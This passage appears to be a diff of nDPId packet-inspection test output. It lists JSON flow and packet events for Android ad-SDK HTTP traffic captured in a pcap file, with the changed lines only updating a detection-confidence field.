AckaQby\/WWRwpV3rIQ2Trggx6ghxefPXn55\/\/9duvP3v5zTfffv3Vf\/\/125d\/+\/vz3\/3zP7\/5w3dffPniT79\/8cWX333+2QB4+e8\/Pv\/HX0IJVEH+yachcI9pSNqHxTbrsBRjkMOPfwIJMI4ScnifHx7uuVx89M5784921Yf78vDzR7X4+ME7H\/YPfvWef\/TT\/dsRTZCvEmBVeb13VrHIEtPDMszoSrqmYIVVeIQc3jWapG4F3J5z3Q\/PcOGZk5ak0ZDDI9POeqnUTBualWLmRI+OCz7DioSbMWW81LsZ7cWsl5qb\/lamwN27yngxk3T7sSQlhrXDeEYmphE\/iphWkzsWzHBx4seh3xds3Ju\/E1v3f3YpPn7wwduRMa\/GV\/tIE1do6zFy1SkIC1xk621oDm+vRZHATpCtvj+K3K1XUUA7sjH7XkWR7YlsQUcrYt59N0hAikMcy7hgFoJBk9IXntBRa4u4TX\/0JJoB60U7BK3lQdtZAlcE+SdPgZsGZegOWpuitb5SR+FSZhpIoDKuwUA9PEtehfKr1tOdcdK8HsaMJmdUWhu2xw6nc7ZOpXtUJpR6ZnWeovWo8MxuiKdK6CfNYRrG7gZzd4ORQ1ZLvbsTuBHoWycaoQmtPMe5vJdNtuQe8so4Jl4PUrrepkxPArLpMjxLkXuhvXGpcbsJWlWdElqS7EzjAxDtAfmJOi1oqvsdU5LVaS+YMi2fVmBEorVOdEZ1YrqSHrnZmXRnlkPmyf0hv9huz7SsJZOWeGTk6jtIWqbHY\/h\/cvssJYc1tc1ZUsOiZNzjxkxDFxeL9XKbvokWV9k221y+2SuLbHW5+YFXZlOsNFKH7mlxoHPYG\/2nV3YCOEgiHqjhqBGuk0ycSb5TpkSVHpuTRM\/gzSZtTOlQ6vRwfDKBlM5ob9pQ9d1kV7doRzlNpDXI7\/bxBR64QOVDvXLiWEuRM2esn1Zn5Cf19gnqM6c9F0p2wh2DnLloTHlmR33fD01jaFOpKzO1ey2U1HXaTByF6y
U5duarfKPzgJSu\/+8s+jSBq7axFH+j6wLHv1fj39G4orVS7wqGbC8KhyTi73jDwvQmRmQgX4SoK3qpOEMXfOyv2yxbsaazyGrciTgMVHbSEw6T81dmIQG9PBkVvboJ15Avoq8xVSVcrOUX16XcPLLIpN5BvlxcRGzjeX3li9YpyKOv8fl8zri+h1zfi+PU4TFwEKi+npl3y7k1jlDNF2\/Ns+18mc0Xi3l2Md\/wTXmxYuV6cymW6VXw8caK4FmXCdhycEqWBR82eivLnA7kxJB09L02ErYcHoXSngJyPrg4oQQNxqtqlYJ88SyB4N3eihni\/SB7zT9IwCo2JlahhlVkIcTladDgYYQ4Q2K0pLYtlfR74eINZPXWxSYB24fvefkw+E8nKmRkXOF7SWwfHdxy8O5BRE6QO8YuxGyuvbkjuMh9hcqLBDyL857XRfhGIIcP7r9fbNPLdA0J+Ohfhy57e5PCk3GilkOlVHQlDjxT5HlsNZ1ESKYWOqqB4iXp2hDfKqq94v765tHagqQdpD7Gr+hlfyyl498Tiuvm2NLeOPkkXDLSPTUKwvso+ZgJ1Um8reWiO03srgM1sNHaRo6BD+uGOS\/EwTopeNzHyOwygU44L40e3fkygV6UhdDdWDEk0EsWLj2LBHonHg+YjocLV\/bs2f8AAAD\/\/wEAAP\/\/Zfl4rZEOAAA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183618,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"flow_min_l4_payload_len":830,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":830,"midstream":1,"thread_ts_msec":1654385183618,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01579{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":896,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":896,"pkt_l4_len":862,"thread_ts_msec":1654385183618,"pkt":"tKXvZygQnLbQ0+MzCABFAANyCeZAAEAGIZTAqAJ+A0hFntsoAFDk49anhCGol4AYAfYPcQAAAQEICnsWmud\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"} 
-01476{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183618,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"flow_min_l4_payload_len":830,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":830,"midstream":1,"thread_ts_msec":1654385183618,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&unit_ids=%5B8881%5D&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
+01476{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2277,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385183618,"flow_last_seen":1654385183618,"flow_idle_time":7580000,"flow_min_l4_payload_len":830,"flow_max_l4_payload_len":830,"flow_tot_l4_payload_len":830,"flow_avg_l4_payload_len":830,"midstream":1,"thread_ts_msec":1654385183618,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"3.72.69.158","src_port":56104,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"setting.rayjump.com","url":"setting.rayjump.com\/rewardsetting?app_id=32456&sign=3c28ded04e0f4090229968618244b583&unit_ids=%5B8881%5D&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=&mnc=&mcc=&network_type=1&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
01366{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1654385183642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1654385183642,"pkt":"nLbQ0+MztKXvZygQCABFAALDo6BAAPUG04cDSEWewKgCfgBQ2yiEIaiX5OPZ5YAYAHBkvQAAAQEICn9GsqN7FprnSFRUUC8xLjEgMjAwIE9LDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANCkNvbnRlbnQtVHlwZTogdGV4dC9wbGFpbjsgY2hhcnNldD11dGYtOA0KRGF0ZTogU2F0LCAwNCBKdW4gMjAyMiAyMzoyNjoyMyBHTVQNCkNvbnRlbnQtTGVuZ3RoOiA0NTcNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCg0KH4sIAAAAAAAA\/1RSTW\/UMBD9L3M2UpJCKT6XAxLiQLlVlTU7nl2sOnawxylhtf8d2c7ScsrLG79583WGLCglgx4VzPkEGnIh4pxBgUVB0GegWIKkzVC0DBruP4OCpRy8yz85GWdB33y6\/aCgBCcPLOLCCfTjGZBCy4v2IZZE\/NVlaYEqGRWImzkWAX0zXJ4U4Fx9uqJBM+Nv0IMC\/BVATxWIN3ario5lWxj046Ru1PuaQf4U0AAKCL0\/ID3\/aA\/GV8Kk4nfmsPTvW9CjkwKyJqFwsycfMxv0nOTN\/6GIxGAse9y6vqTEgTazt2fR+c0sHjdDuDSl5VNCy\/cuV\/r71cD6wNJsOdhMiTnsrU0KHMXQm\/KCR56lug31L6YXAn07KAg4c38Tj8fMvcyYHAdBcVU\/KFg8Es8cpNY3fRynsXGbIbHx5d+brbV3kGBkBv1uVJBsIukLSIx22yczDpU4Lmtf5hyT70jotXpZDQcL+m5oOAumvr56LF9q4O5uVLDup7JSnegRi++HsDrL0bggnJDErbxnHq6h\/OwWkzj\/L2hsPa\/ewOqSFPTmuqF6xN3kWx3c5ely+QsAAP\/\/AQAA\/\/9ly17OCQMAAA=="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385184096,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01985{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1198,"pkt_l4_len":1164,"thread_ts_msec":1654385184096,"pkt":"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"} -01780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385184096,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=2&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&ad_source_id=1&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +01780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2279,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184096,"flow_last_seen":1654385184096,"flow_idle_time":7580000,"flow_min_l4_payload_len":1132,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1132,"flow_avg_l4_payload_len":1132,"midstream":1,"thread_ts_msec":1654385184096,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43266,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ad\/v3?app_id=32456&unit_id=8881&sign=3c28ded04e0f4090229968618244b583&req_type=2&ad_num=20&tnum=1&only_impression=1&ping_mode=1&ttc_ids=%5B%5D&ad_source_id=1&ad_type=94&offset=0&channel=&platform=1&os_version=11&package_name=com.sceneway.kankan&app_version_name=2.8.2.1&app_version_code=146&orientation=2&model=sdk_gphone_x86&brand=google&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&mnc=&mcc=&network_type=9&network_str=&language=en&timezone=GMT%2B01%3A00&useragent=Mozilla%2F5.0%20%28Linux%3B%20Android%2011%3B%20sdk_gphone_x86%20Build%2FRSR1.201013.001%3B%20wv%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Version%2F4.0%20Chrome%2F83.0.4103.106%20Mobile%20Safari%2F537.36&sdk_version=MAL_8.7.4&gp_version=22.4.25-21%20%5B0%5D%20%5BPR%5D%20337959405&screen_size=1794x1080&is_clever=2&version_flag=1&cache1=6240&cache2=5365&power_rate=100&charging=0&sub_ip=10.0.2.16&dvi=4BztYrxBYFQ3%2BFQ3RUE0DUQQiUlbfADAfnx3iUVPHZRsRrfuHoR1RUv06N%3D%3D&api_version=1.3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184117,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"flow_min_l4_payload_len":252,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":252,"midstream":1,"thread_ts_msec":1654385184117,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00790{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":1,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1654385184117,"pkt":"tKXvZygQnLbQ0+MzCABFAAEkBJZAAEAGB9zAqAJ+CNFha936AFBSP8o9I7uXO1AYAfYueQAAUE9TVCAvIEhUVFAvMS4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtd3d3LWZvcm0tdXJsZW5jb2RlZA0KQ2hhcnNldDogVVRGLTgNClJhbmdlOiBieXRlcz0wLQ0KQ29udGVudC1MZW5ndGg6IDc5Ng0KSG9zdDogYW5hbHl0aWNzLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBBcGFjaGUtSHR0cENsaWVudC9VTkFWQUlMQUJMRSAoamF2YSAxLjQpDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184117,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"flow_min_l4_payload_len":252,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":252,"midstream":1,"thread_ts_msec":1654385184117,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
+00801{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2280,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184117,"flow_last_seen":1654385184117,"flow_idle_time":7580000,"flow_min_l4_payload_len":252,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":252,"midstream":1,"thread_ts_msec":1654385184117,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"8.209.97.107","src_port":56826,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"analytics.rayjump.com","url":"analytics.rayjump.com\/","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 01518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2281,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":2,"flow_last_seen":1654385184118,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":850,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":850,"pkt_l4_len":816,"thread_ts_msec":1654385184118,"pkt":"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"} 00575{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2282,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":178,"flow_packet_id":3,"flow_last_seen":1654385184139,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1654385184139,"pkt":"nLbQ0+MztKXvZygQCABFAACApCdAADgGcO4I0WFrwKgCfgBQ3foju5c7Uj\/OVVAYAD8bqQAASFRUUC8xLjEgMjA0IE5vIENvbnRlbnQNCkRhdGU6IFNhdCwgMDQgSnVuIDIwMjIgMjM6MjY6MjQgR01UDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184174,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"flow_min_l4_payload_len":940,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385184174,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01729{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":1,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1006,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1006,"pkt_l4_len":972,"thread_ts_msec":1654385184174,"pkt":"tKXvZygQnLbQ0+MzCABFAAPgd\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"} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184174,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"flow_min_l4_payload_len":940,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385184174,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": 
{"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ads?app_id=32456&unit_id=52498&sign=3c28ded04e0f4090229968618244b583&is_vast=1&ad_num=1&http_req=1&client_ip=92.219.40.235&useragent=Dalvik%2F2.1.0+%28Linux%3B+U%3B+Android+11%3B+sdk_gphone_x86+Build%2FRSR1.201013.001%29&os_version=Android11&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&model=sdk_gphone_x86&brand=Google&android_id=b9e28776354d259e&platform=1&imei=1&network_type=9","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2283,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184174,"flow_last_seen":1654385184174,"flow_idle_time":7580000,"flow_min_l4_payload_len":940,"flow_max_l4_payload_len":940,"flow_tot_l4_payload_len":940,"flow_avg_l4_payload_len":940,"midstream":1,"thread_ts_msec":1654385184174,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.79.58","src_port":43272,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"net.rayjump.com","url":"net.rayjump.com\/openapi\/ads?app_id=32456&unit_id=52498&sign=3c28ded04e0f4090229968618244b583&is_vast=1&ad_num=1&http_req=1&client_ip=92.219.40.235&useragent=Dalvik%2F2.1.0+%28Linux%3B+U%3B+Android+11%3B+sdk_gphone_x86+Build%2FRSR1.201013.001%29&os_version=Android11&gaid=5ac6a0ff-8d18-47bc-a902-2812cf0c251e&model=sdk_gphone_x86&brand=Google&android_id=b9e28776354d259e&platform=1&imei=1&network_type=9","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 
01051{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2284,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":179,"flow_packet_id":2,"flow_last_seen":1654385184282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":500,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":500,"pkt_l4_len":466,"thread_ts_msec":1654385184282,"pkt":"nLbQ0+MztKXvZygQCABFAAHmJVIAAPgGdx8SQE86wKgCfgBQqQhpQqwFG\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"} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184845,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01866{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_packet_id":1,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1110,"pkt_l4_len":1076,"thread_ts_msec":1654385184845,"pkt":"tKXvZygQnLbQ0+MzCABFAARIuCtAAEAGLI\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"} 
-01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184845,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=411&s_h=731&u_w=411&u_h=683&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=1&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=0&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} 
+01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184845,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=411&s_h=731&u_w=411&u_h=683&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=1&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=0&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%